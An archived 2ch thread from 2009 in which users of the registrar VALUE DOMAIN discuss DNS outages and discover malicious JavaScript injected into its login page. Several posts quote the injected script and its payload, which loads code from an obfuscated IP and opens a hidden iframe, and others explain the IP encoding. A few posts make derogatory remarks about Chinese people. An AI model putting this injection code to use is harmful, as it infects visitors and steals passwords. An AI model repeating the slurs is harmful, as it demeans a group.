VALUE DOMAINってどう ..
[2ch|▼Menu]
2:名無しさん@お腹いっぱい。
09/07/06 06:19:49 0
過去スレ
VALUE DOMAINってどうよ? part31
スレリンク(hosting板)
VALUE DOMAINってどうよ? part30
スレリンク(hosting板)
VALUE DOMAINってどうよ? part29
スレリンク(hosting板)
VALUE DOMAINってどうよ? part28
スレリンク(hosting板)

3:名無しさん@お腹いっぱい。
09/07/06 06:20:45 0
Q. VDが潰れたら俺のドメインどうなるの?

A.URLリンク(access.enom.com)
レジストラがeNomの場合はここでドメイン情報を操作できる
パスワードはVDの管理画面から取得できるのでメモしておくべし
Key Systems管理のドメインの場合は不明、eNomに移管した方が良いかも

補足
VDが健在の場合は定期的にVDに保存されている情報が上書きされる
またeNomで設定するにはネームサーバをeNom提供のものへ変更する必要があるので
VDのネームサーバを使ってる人は最長48時間程度のタイムラグが生じる可能性がある

詳細
URLリンク(sb.xrea.com)

Q. 汎用JPの場合はどうなるの?

A. JPNICと傘下のJPRSがちゃんと次の業者を指定してくれる
指定業者にするもよし、好きな業者を選ぶこともできる

実例
URLリンク(jprs.jp)

Q. というかVDって倒産するの?

A. XREAやCOREのサービスが不安定で2chでの評価は下がっているけどサーバは常にほぼ満員
以下のページによるとデジロック名義にしているドメインだけで14万個以上あり
単純に考えてドメイン販売だけで億単位の売り上げがある

URLリンク(whois.domaintools.com)

4:名無しさん@お腹いっぱい。
09/07/06 06:21:31 0
VDが逝く前にしておきたいドメイン防衛(gTLDの場合)

・eNom管理にする
 →VDの管理画面にログインできないときは URLリンク(access.enom.com) から操作可能

・Whoisのドメイン管理者のメールアドレスは独自ドメイン以外の連絡のつくアドレスにする
 →移管手続きの連絡は、ここで設定されたアドレスで行われる
 →迷惑メールフィルタのあるメールがよい

・いつでも他事業者に移管できるよう、ドメインロックは外しておく
 →ドメインロックがかかっていると移管手続きができないことがある

・認証鍵(Authorization Info)はメモ、あるいはメールで送ってもらう
 →移管手続きには必要。今のうちにVDの管理画面から取得しておく

 参考
  URLリンク(sb.xrea.com)
  URLリンク(kazamidori.net)

5:名無しさん@お腹いっぱい。
09/07/06 06:22:43 0
前スレ保管庫
VALUE DOMAINってどうよ? part32
URLリンク(mimizun.com)
上記で読めないときは
URLリンク(www.geocities.jp)スレリンク(hosting板)

6:名無しさん@お腹いっぱい。
09/07/06 06:27:16 0
はじめて正式スレを立てました。やったw

で、前の続きですが、
URLリンク(www.value-domain.com)
午前4時30分ごろから、上のログインページにログインしようとすると、
ActiveXのインストールが実行しようとされていたのですが、
今はなおってますね。午前6時26分にActivX消えました。
なんだったのでしょうか。

7:名無しさん@お腹いっぱい。
09/07/06 06:29:36 0
実行元を調べると、以下だった↓
URLリンク(110.165.41.103:888)
そして、そのIPを調べると・・・
URLリンク(safeweb.norton.com)
↑ウイルスだーー!クラックされたかと思ったのだが、
なんだったのか・・・

8:名無しさん@お腹いっぱい。
09/07/06 06:30:55 0
症状がこっちで確認できんから何もと言えんな…
自分の環境の問題って訳じゃないよな?

9:名無しさん@お腹いっぱい。
09/07/06 06:36:33 0
環境の問題だけでログインページだけアクティブXでるのって
初めてだ。そういうこともあるんですね。ノートンクイックスキャンで調べたら
Cookieが検出されただけだったけど。

10:名無しさん@お腹いっぱい。
09/07/06 06:59:16 0
VD・・潰れたら夜逃げってことないよな?
業務移管とかしないのかな・・。
どうせ止めるんだったら、
優秀な他の業者に業務移管して、さよならとしてほしいけど

11:名無しさん@お腹いっぱい。
09/07/06 07:58:50 0
>>10
今のうちに>>4を見て、
自分でできることはやっておこうぜ、兄弟!!

12:名無しさん@お腹いっぱい。
09/07/06 09:28:58 P
汎用JPは安心を買っていると思えば安いな

13:名無しさん@お腹いっぱい。
09/07/06 09:58:01 0
ns鯖は今日は7時くらいから調子いいじゃん珍しく

14:名無しさん@お腹いっぱい。
09/07/06 10:14:31 0
どうせそのうちまた(ry

15:名無しさん@お腹いっぱい。
09/07/06 10:30:39 0
いつも通り死んでますが?w

16:名無しさん@お腹いっぱい。
09/07/06 12:56:34 0
現在、弊社の無料ネームサーバーが正常動作しないというご報告を多数いただいており、最優先業務として、担当部門がネームサーバー側の確認、および、接続回線(上位プロバイダーも含みます)の確認などの緊急対応を行っております。

この不具合のため、
 ●独自ドメインへのアクセスが不安定
 ●弊社サブドメインのアクセスが不安定
という症状が発生し、その結果、
 ●メールが届いたり届かなかったりする
 ●サイトにアクセスできたりできなかったりする
 ●サーバーに設定しているドメインの設定が解除される
 ●その他、サーバー、ドメインの各種不具合が発生する
という不安定な状況になっております。

また、直接的には無関係ではございますが、
 ●レンタルカウンターの不具合
 ●レンタルチャットの不具合
などの報告もいただいております。

現時点における回避策としましては、弊社以外のネームサーバー(転送有ドメインのenom社のネームサーバーも含みます)をご利用可能な場合は、そちらに切り替えていただくことになり、新たなDNS情報が浸透後(約24〜48時間の後)にご利用可能な状態になるものと思われます。
しかしながら、弊社の無料サーバーのみをご利用の場合は、誠に申し訳ございませんが、担当部門による本症状の解決をお待ちいただく形になります。
(特にネームサーバー関係の不具合につきましては、完全に正常化されました場合であっても、おおむね48時間以内に徐々に浸透して安定していく形になり、その間、接続が不安定になる場合もございます)


不安定な状態が続いており、ご不便をおかけしておりますことを改めてお詫び申し上げますと共に、
 ━━━━━━
 ━━━━━━
 ●本ご回答から【7日間】改善をお待ちいただく
 ●再度のご連絡は【7日経過後も改善しない場合】にいただく
 ━━━━━━
 ━━━━━━
という形でのご協力をお願い申し上げます。

17:名無しさん@お腹いっぱい。
09/07/06 12:57:39 0
↑ 前スレより転載


障害発生より一ヵ月以上経ちますがその後ご機嫌いかがですか社員さん

18:名無しさん@お腹いっぱい。
09/07/06 13:13:09 0
変わりなく過ごしております

19:名無しさん@お腹いっぱい。
09/07/06 13:24:43 0
対応出来る技術者を捜してる

とりあえず直させる

技術者逃亡

また捜す ←今ここ

20:名無しさん@お腹いっぱい。
09/07/06 13:28:47 0
とっとと外注して復旧させろよ

21:名無しさん@お腹いっぱい。
09/07/06 14:01:14 0
外注は去年の広告鯖ウイルス混入事件で懲りてるんじゃない?
と言っても社内にそれなりの技術者いないなら外注しなきゃ仕方無いんだろうけど。

22:名無しさん@お腹いっぱい。
09/07/06 14:18:33 0
障害発生

放置

放置

放置 ←今ここ

23:名無しさん@お腹いっぱい。
09/07/06 15:32:04 0
もうこりゃ復旧は無理だろ 直せるもんならとっくに直ってるよ

24:名無しさん@お腹いっぱい。
09/07/06 15:35:48 P
食う

寝る

食う

寝る

100kg超え ←俺今ここ

25:名無しさん@お腹いっぱい。
09/07/06 15:39:15 0
>>24
運動しろww

26:名無しさん@お腹いっぱい。
09/07/06 15:41:48 0
>>6
ログインページ(SSL対応)にアクセスしたところ、
「SSLでないページが混在しています」のメッセージが出たのでおかしいなと思ったら、
ソースの326行目あたり、パスワード入力欄の下あたりに不審なJavaScriptが埋め込まれてるな

Googleキャッシュ(2009年7月3日 15:38:39 GMT)では上記のJavaScriptは存在しない
実際にウイルスかどうかは確認していないが、見た感じのソースは限りなくウイルス臭い

27:名無しさん@お腹いっぱい。
09/07/06 15:45:20 0
ガチ末期ですか?

28:名無しさん@お腹いっぱい。
09/07/06 16:27:52 0
なんかサポ板もバグってるみたいで収集つかなくなってるね

29:名無しさん@お腹いっぱい。
09/07/06 17:22:28 0
>>6

URLリンク(1856317799:888)
のことかな
確かにパスーワード入力欄の下に埋め込まれてる

1856317799のIPアドレスは110.165.41.103
>>7
のIPと一致するけど、
正常なスクリプトか、ウイルスか、パス抜きか・・・

なんかよく分からんが、ログインするのはヤメとくか

30:名無しさん@お腹いっぱい。
09/07/06 17:29:50 0
なんだかなあ・・・
あっちもこっちもボロが出てるなぁ・・・

31:名無しさん@お腹いっぱい。
09/07/06 17:31:42 0
>>29
これか・・・
<SCRIPT LANGUAGE="JAVASCRIPT">
    var js = document.createElement("script");
    js.src = "http://1856317799:888/s.js";
    try {document.getElementsByTagName('head')[0].appendChild(js);}
    catch(exp){}
    js = null;
</SCRIPT>

さっきログインしてしまった・・・orz

32:名無しさん@お腹いっぱい。
09/07/06 17:41:57 0
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf(”O=”)==−1)

    var js = document.createElement(’iframe’);
    js.src = ”http:¥/¥/0x6EA52967:888/dir/show.php”;
    js.width=0;
    js.height=0;
    try {document.getElementsByTagName(’head’)[0].appendChild(js);}
    catch(exp){}
    js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”O=Yes;path=/;expires=”+expires.toGMTString();
}/*dasdadadsadasdas*/

33:名無しさん@お腹いっぱい。
09/07/06 17:44:36 0
何これpass抜きか何か?

34:名無しさん@お腹いっぱい。
09/07/06 17:45:36 0
URLリンク(safeweb.norton.com)

Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。

見つかった脅威の合計: 8

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Bloodhound.Exploit.193
場所: URLリンク(110.165.41.103:888)

35:名無しさん@お腹いっぱい。
09/07/06 17:51:16 0
このセキュリティの甘さは何なんだお?

36:名無しさん@お腹いっぱい。
09/07/06 17:53:58 0
完全に投げ出したか

37:名無しさん@お腹いっぱい。
09/07/06 17:58:22 P
俺のガマン汁もそろそろ限界だ。

38:名無しさん@お腹いっぱい。
09/07/06 17:58:57 0
これは
www.value-domain.com/
が乗っ取られたと解釈した方がいいのか?


39:名無しさん@お腹いっぱい。
09/07/06 18:05:00 0
wikiwikiもやられてるみたいだな。GENO系統だろ。
ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね?

40:名無しさん@お腹いっぱい。
09/07/06 18:11:01 0
どうりで今日はデジロ社員が2ch工作してない訳だw
多分今頃、事務所は修羅場なんだろw

41:名無しさん@お腹いっぱい。
09/07/06 18:11:59 0
かんべんしてよマジで
IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない

42:名無しさん@お腹いっぱい。
09/07/06 18:13:29 0
大丈夫かよデジロ

43:名無しさん@お腹いっぱい。
09/07/06 18:16:25 0
>>40
多分、社員はまだ気がついていないんじゃないかな
javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね


44:名無しさん@お腹いっぱい。
09/07/06 18:28:27 0
もしパス抜かれてたら、パス変更したら大丈夫なの?

45:名無しさん@お腹いっぱい。
09/07/06 18:28:31 P
そもそも書き換えられたことが問題。


46:名無しさん@お腹いっぱい。
09/07/06 18:38:47 0
一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考
差し替えたら取れなくなる資料は今のうちに取っておいて、
あとは原因追究、恒久的対応だろ

47:名無しさん@お腹いっぱい。
09/07/06 18:38:49 0
初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの?
あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの?
教えてエロい人。

48:名無しさん@お腹いっぱい。
09/07/06 18:39:08 0
とりあえず、マスコミに報告だ。

そうでもしなきゃ、隠蔽するだろ、ここ。

49:名無しさん@お腹いっぱい。
09/07/06 18:40:48 0
>>47
1856317799 = 0x6EA52967 = 110.165.41.0

50:名無しさん@お腹いっぱい。
09/07/06 18:41:30 0
すまん、

1856317799 = 0x6EA52967 = 110.165.41.103



51:名無しさん@お腹いっぱい。
09/07/06 18:52:04 0
0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。
ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったw
スレ汚し失礼しました。

52:名無しさん@お腹いっぱい。
09/07/06 18:57:31 0
こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では
まず使われないからな


53:sage
09/07/06 19:00:14 0
>>51
なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。


54:名無しさん@お腹いっぱい。
09/07/06 19:01:56 0
0xではじまるのは16進数

55:名無しさん@お腹いっぱい。
09/07/06 19:02:50 0
ところで、ns1-3.value-domain.com がひけないんだが、俺だけ?

56:名無しさん@お腹いっぱい。
09/07/06 19:04:48 0
110.165.32.0/19は香港のアドレスブロックか
相変わらず中国人はクソ以下だな

57:名無しさん@お腹いっぱい。
09/07/06 19:05:58 0
ns2が引けないな。1と3は引ける

58:名無しさん@お腹いっぱい。
09/07/06 19:08:30 0
>>55
そんなのもう5月の終わりからだぞw

59:名無しさん@お腹いっぱい。
09/07/06 19:09:29 0
ネームサーバも酷いな、とりあえずenomにして
あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく

60:名無しさん@お腹いっぱい。
09/07/06 19:11:26 0
しっかし、これだけ対応悪いと、
過去に隠蔽された情報漏洩やハッキング被害がイパーイあるのでは?と疑いたくなる。


61:名無しさん@お腹いっぱい。
09/07/06 19:13:01 0
とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。

GIGAZINE、期待してるよ。

62:名無しさん@お腹いっぱい。
09/07/06 19:14:05 0
>>51
1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103

0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる:

0x6EA52967 → 0x6E 0xA5 0x29 0x67
0x6E = 110
0xA5 = 165
0X29 = 41
0x67 = 103

63:名無しさん@お腹いっぱい。
09/07/06 19:17:27 0
>>62
もういいって
ping 1856317799
とでも打てばすぐに分かることだし


64:名無しさん@お腹いっぱい。
09/07/06 19:19:21 0
惰性のみでM調教受け続けてきましたがさすがにもう無理です。
ごめんなさいドSデジロご主人様。

65:名無しさん@お腹いっぱい。
09/07/06 19:20:43 0
・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。


66:名無しさん@お腹いっぱい。
09/07/06 19:24:00 0
>>65

>>16

先月1日あたりからアナウンスも一切無くずっと放置だよ

67:名無しさん@お腹いっぱい。
09/07/06 19:28:58 P
とりあえず垢のパスは変えた方がいいのかな?どうなのかな?

68:名無しさん@お腹いっぱい。
09/07/06 19:31:50 0
おちおちコンパネにログインすらできんってどうよ
移管もできねーじゃん

69:名無しさん@お腹いっぱい。
09/07/06 19:32:13 0
>>66

これって死にッぱなし・・・じゃないよね?
だったらHPもメールも動かなくなるわけだし。



70:名無しさん@お腹いっぱい。
09/07/06 19:35:33 0
>>69
orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。


71:名無しさん@お腹いっぱい。
09/07/06 19:44:32 P
知らずにログインしてた…
念のためJavaSciprt無効化してからログインしてパスワード変更したよ。

72:名無しさん@お腹いっぱい。
09/07/06 19:57:50 0
>>67
コンパネのパスを抜かれるって事はxreaのログイン情報から
メールのパスワードまで全部つながって見えるって事だから
とりあえず、JavaSciprtをoffにしてパスワードを変更した。

73:72
09/07/06 20:04:17 0
追加。
よく考えたらxreaどころじゃねぇ、
抜かれたパスワードからさらに他のパスワードに換えられたら、
こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。
ログイン履歴をメモしておかないとな。
自分が寝ているハズの時間のログイン記録があるかもよ。

74:名無しさん@お腹いっぱい。
09/07/06 20:07:31 0
わざわざ今ログインしてる人って頭XXXXX

75:名無しさん@お腹いっぱい。
09/07/06 20:15:16 0
改ざんされてる割には
あまり騒いでないな


76:名無しさん@お腹いっぱい。
09/07/06 20:27:01 0
JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では?
つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。
今はログインせずに、アナウンスを待つよりほかない。


77:名無しさん@お腹いっぱい。
09/07/06 20:29:44 0
他社で取得したco.jpドメイン運用しているんだけど、
NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと?



78:名無しさん@お腹いっぱい。
09/07/06 20:31:10 0
まさか本当にGENO系?
それならvalue-domain.comのFTPパス抜かれたってことか
最悪だ

79:名無しさん@お腹いっぱい。
09/07/06 20:36:44 0
GENO系かどうかはわからないけど、login.phpが改竄されたってことは
少なくともftpの垢パスが漏れていると言う事実は変わらない。
もしかしたらもっと上位の垢パスの可能性だってある。

80:名無しさん@お腹いっぱい。
09/07/06 20:58:10 0
ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか
これ、どう処理するんだろ
適当にパスワード変更してください、って告知して、また100日無料期間追加程度で終わるのかな

81:名無しさん@お腹いっぱい。
09/07/06 21:49:42 0
やばいよよばいよ

82:名無しさん@お腹いっぱい。
09/07/06 21:52:07 0
まだ直ってないの?

83:名無しさん@お腹いっぱい。
09/07/06 22:12:14 0
>>32のs.jsって本当にあるね……
俺、javascriptってよくわかんないんだけど、
ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと?

84:名無しさん@お腹いっぱい。
09/07/06 22:14:53 0
この先いったいどうなることやら

85:名無しさん@お腹いっぱい。
09/07/06 22:20:19 P
URLリンク(www.value-domain.com)

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "URLリンク(1856317799:888)";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>


URLリンク(www.value-domain.com)
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "URLリンク(1856317799:888)";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

当たり前だけ両方あるな


86:名無しさん@お腹いっぱい。
09/07/06 22:27:49 P
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("O=")==-1)
{
var js = document.createElement('iframe');
js.src = "http:\/\/0x6EA52967:888/dir/show.php";
js.width=0;
js.height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
}/*dasdadadsadasdas*/


http:\/\/0x6EA52967:888/dir/show.php

URLリンク(110.135.41.103)

87:名無しさん@お腹いっぱい。
09/07/06 22:31:58 0
To: 85-86

>>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか,
考えてみよう.

88:名無しさん@お腹いっぱい。
09/07/06 22:33:17 0
>>85
>>86
既出
上で書いてあることをいちいち書き込まなくてよろしい
しかも香港鯖にリンクを貼るなや

89:名無しさん@お腹いっぱい。
09/07/06 22:40:35 0
ウィルスURLを張るのは普通に通報対象です

90:名無しさん@お腹いっぱい。
09/07/06 22:46:18 0
で、肝心のデジロは把握してるの?

91:名無しさん@お腹いっぱい。
09/07/06 22:49:31 0
把握していないのでは?
<script>〜</script>を削除するくらい一瞬で終わる

92:名無しさん@お腹いっぱい。
09/07/06 22:51:23 0
誰かが魚拓とってくれたみたいだ。

URLリンク(www.value-domain.com)">URLリンク(s03.megalodon.jp))

93:名無しさん@お腹いっぱい。
09/07/06 22:52:08 0
試しに問題のURLを確認してみた

問題の飛ばされる先のm.htmに、ノーガードで突っ込んでみると、
XPだと、
ドライブ:/Documents and Settings/ユーザ名/Application Data
のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか

詳細は不明
何かがやられているのは確かだ

実験するのは自己責任で

94:名無しさん@お腹いっぱい。
09/07/06 22:56:05 0
つーことは、ログインするとパスが抜かれるのではなく、
ログインページを開くだけで感染するってこと?

95:名無しさん@お腹いっぱい。
09/07/06 22:59:41 0
>>93に追記

ログをおったら、Keyloggerを検知した
やはりパスワード抜きで確定だと思う

96:名無しさん@お腹いっぱい。
09/07/06 23:06:19 0
要は javascript 実行させない環境で見れば
問題ないのかな

普段はFireFox+ NoScriptで普段はjavascript
実行させないようにしてるけど・・・

97:名無しさん@お腹いっぱい。
09/07/06 23:07:53 0
>>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
URLリンク(www.dotup.org)

これは酷い

98:名無しさん@お腹いっぱい。
09/07/06 23:12:33 0
login.phpに<script>を埋め込むことができるなら、
login.phpのログイン時の処理にも細工がしてある可能性もある

JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難


99:名無しさん@お腹いっぱい。
09/07/06 23:13:36 P
>>93
踏んだけどなかったなぁ
そもそもそのURL鯖落ちしてないか?

100:名無しさん@お腹いっぱい。
09/07/06 23:16:19 0
URLリンク(www.value-domain.com)
にアクセスするだけで感染?

101:名無しさん@お腹いっぱい。
09/07/06 23:19:14 0
>>98
確かにそうだね
しかしそろそろドメインの更新できないと困る・・・

しかも他ではあんまり扱ってないドメインだから
移管するのも面倒だし

102:名無しさん@お腹いっぱい。
09/07/06 23:22:45 0
Windows以外のOSかVistaでアクセスした方がいいね

103:名無しさん@お腹いっぱい。
09/07/06 23:23:20 0
>>93 >>95 >>97だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから
ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う
カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど

m.htmのほうはこんな感じ、show.phpのほうは何も吐き出してこないから、何やってるか全く不明。

正直、なんともいえんけど、
とりあえず、実験に使ったPCは念を入れて、リカバリ中

104:名無しさん@お腹いっぱい。
09/07/06 23:26:20 0
>>101
ccTLDは基本的に移管できないよ
認証鍵があるtvは移管できるかもしれないけど

105:名無しさん@お腹いっぱい。
09/07/06 23:27:24 0
>>102
HDDはずしてubuntuをCD-ROMブートで使うのが
セキュリティ上いいのかしら(´・ω・`)

Winのセキュリティソフトもすぐ対応してくれないと
意味ないし・・・

106:名無しさん@お腹いっぱい。
09/07/06 23:28:31 0
avastは検出してくれないなぁ〜
このキーロガーは、VDのパスを狙っているのではなく、
VD利用者が日頃入力するパスを狙ってるってことかな?

107:名無しさん@お腹いっぱい。
09/07/06 23:35:44 0
GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。


108:名無しさん@お腹いっぱい。
09/07/06 23:42:28 0
>>102
phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う
ログインすることそれ自体が危険

109:名無しさん@お腹いっぱい。
09/07/06 23:47:00 O
夕方ログインした
もう、手遅れだろうから
全部諦める事にしたよ
大規模な改ざんが来そうだね

110:名無しさん@お腹いっぱい。
09/07/07 00:04:41 0
ログイン出来なきゃサポにも連絡できねえ。
問題が大きくなる前に対処しないとやばいんじゃね?

111:名無しさん@お腹いっぱい。
09/07/07 00:16:30 0
今は消えてるみたい。やっと気づいたかな?
でも、相変わらず報告なしだなぁ

112:名無しさん@お腹いっぱい。
09/07/07 00:20:36 0
今北
何?ログインページにロガー仕込まれたの?マジで??
今確認する分にはヘンなスクリプトは入ってなさげだけど…
マジで仕込まれていたなら事は重大だなあ

デジロは早急に今判っていることだけでもアナウンスすべき

113:名無しさん@お腹いっぱい。
09/07/07 00:25:57 0
本当だ、いつのまにかなくなってる
でも、>>92で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい
この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな

114:名無しさん@お腹いっぱい。
09/07/07 00:26:31 0
社員がここを見て気づくというオチ

115:名無しさん@お腹いっぱい。
09/07/07 00:30:46 0
多分直接関係ないとはいえ、
お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる…


116:名無しさん@お腹いっぱい。
09/07/07 00:40:06 0
ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。
一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。

login.phpが改竄されていたことには変わらない。
まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、
URLリンク(www.value-domain.com)
を開くことも控えるべき

117:名無しさん@お腹いっぱい。
09/07/07 00:44:17 0
DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ……
VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、
今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな

118:名無しさん@お腹いっぱい。
09/07/07 00:52:06 P
ふぅ、
とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。

俳人(廃人)の俺がここで一句
面倒くせぇ あぁ面倒くせぇ 面倒くせぇ

119:名無しさん@お腹いっぱい。
09/07/07 00:53:06 0
>>116
login.phpが書き換えられたというよりも、
login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。
ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。
よくあるSQLインジェクションみたいなもんじゃないかなー

120:名無しさん@お腹いっぱい。
09/07/07 00:53:39 0
改竄されていたのは login.php だけだったのか?
という疑問も残っている。

ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。
どのページからでも情報漏洩の危険はあるってことだ。
さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。

このくらいできるよね>VD社員

121:名無しさん@お腹いっぱい。
09/07/07 00:59:41 0
とりあえずサポートフォームから
「事は重大だから最低でも朝イチでアナウンスが欲しい」
っと送っておいた
質問カテゴリ=利用前質問ならログイン無しでも送信できるしな
今の状況下でログインなんか怖くてできない

122:名無しさん@お腹いっぱい。
09/07/07 01:11:13 0
スレをちゃんと読まずに、>>72>>118と同様、ログインしてパス変えてしまった

login.phpの内部処理が改竄されていた場合、ログインしたユーザーには
どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど

123:名無しさん@お腹いっぱい。
09/07/07 01:12:38 0
phpまでやられてたら、サーバでできることはほとんどなんでもできるよ

124:名無しさん@お腹いっぱい。
09/07/07 01:22:21 0
まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや

phpの内部処理が改竄されている可能性を考慮すると、
・JavaScriptをOFFにしてログインする
・以前のログイン情報がcookieに残っているユーザー(ログイン状態を維持しているユーザー)が、VDのサイトを開く

ってのも控えたほうがいいと思われる。

つまりアナウンスを見に行くのですら気を使う必要があるかもね
既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・


125:名無しさん@お腹いっぱい。
09/07/07 01:27:20 P
>アナウンスを待とうや

そのアナウンスが、素直に出てくるとでも思っているのかい?

126:名無しさん@お腹いっぱい。
09/07/07 01:36:45 0
んなこた知るか
当然すべきことを期待しているだけだ

通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね


127:名無しさん@お腹いっぱい。
09/07/07 01:50:45 0
当然すべきことを期待しているだけだ(大爆笑)

128:名無しさん@お腹いっぱい。
09/07/07 02:02:31 0
たまたま見たらこんなことに・・・涙
ドメイン100個以上使っているのでドビックリしてます。

129:名無しさん@お腹いっぱい。
09/07/07 02:10:20 0
>>128
何度目のビックリですか?

130:名無しさん@お腹いっぱい。
09/07/07 02:19:20 0
この程度でビックリしているようじゃここは使えませんよ

131:名無しさん@お腹いっぱい。
09/07/07 02:28:16 0
当然すべき事を意地でも徹底放置するのがデジロじゃないかw

132:名無しさん@お腹いっぱい。
09/07/07 02:33:57 0
なんでここって重大な障害等が発生してもいつも一切アナウンスしないの?

133:名無しさん@お腹いっぱい。
09/07/07 02:36:43 0
重大な障害じゃないんだよ。
ここでは鯖が1台どこかに消えちゃったとかが重大な障害

134:名無しさん@お腹いっぱい。
09/07/07 02:37:54 0
入金やカネに関する事はマメにアナウンスするのになw
逆に言うとそれ以外の事は一切アナウンスしないw

135:名無しさん@お腹いっぱい。
09/07/07 02:39:30 0

アナウンスしたら負けだと思っています



136:名無しさん@お腹いっぱい。
09/07/07 02:44:17 P
これから他の鯖屋工作員も加勢して、賑やかなスレになりそうだね。
ギガジンが記事にしたらもぅ、それこそ七夕祭りだな(ワラ

137:名無しさん@お腹いっぱい。
09/07/07 02:45:41 0
分かってない奴が多いねえ
鯖の障害をアナウンスしなかったこととは、チト違ってくる
法が絡むでのぉ

138:名無しさん@お腹いっぱい。
09/07/07 02:48:34 0
どんな法がどう絡んでくるの?
具体的にどうぞ。

139:名無しさん@お腹いっぱい。
09/07/07 02:54:46 0
いちいち聞くな、自分で調べろ
おっと、こーゆーときに「ググレカス」ってんだっけ

140:名無しさん@お腹いっぱい。
09/07/07 03:00:47 0
そんなわかりやすい逃げ打たれてもw
裏付けできないテキトーな事言うなって

141:名無しさん@お腹いっぱい。
09/07/07 03:12:56 0
規約にこんなこと書いてあるからVDはなにもしなくてもOK
やるかやらないかはもはやVDの気分次第


VALUE DOMAIN サービス利用規約
 利用者は日本国内に在住で、且つ、日本語を理解できるものとします。

【責任の限界について】
 以下の事項に起因して発生する可能性のある損失について、
 当社及び上位レジストラは、利用者あるいは第三者に対して責任を負わないことに、
 利用者は同意するものとします。

●あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
●あらゆる非常事態が発生したことによる損失

142:名無しさん@お腹いっぱい。
09/07/07 03:14:21 0
ググレカスって
逃げ口上にも使えるんだなあ
               みつを

143:名無しさん@お腹いっぱい。
09/07/07 03:16:57 0
なんつーか、毎度のことながら、鯖がクラックされるって酷すぎだよな
また保守管理を委託してるシナ人の仕業なんじゃね?
あいつら、何度注意したって聞かねーし

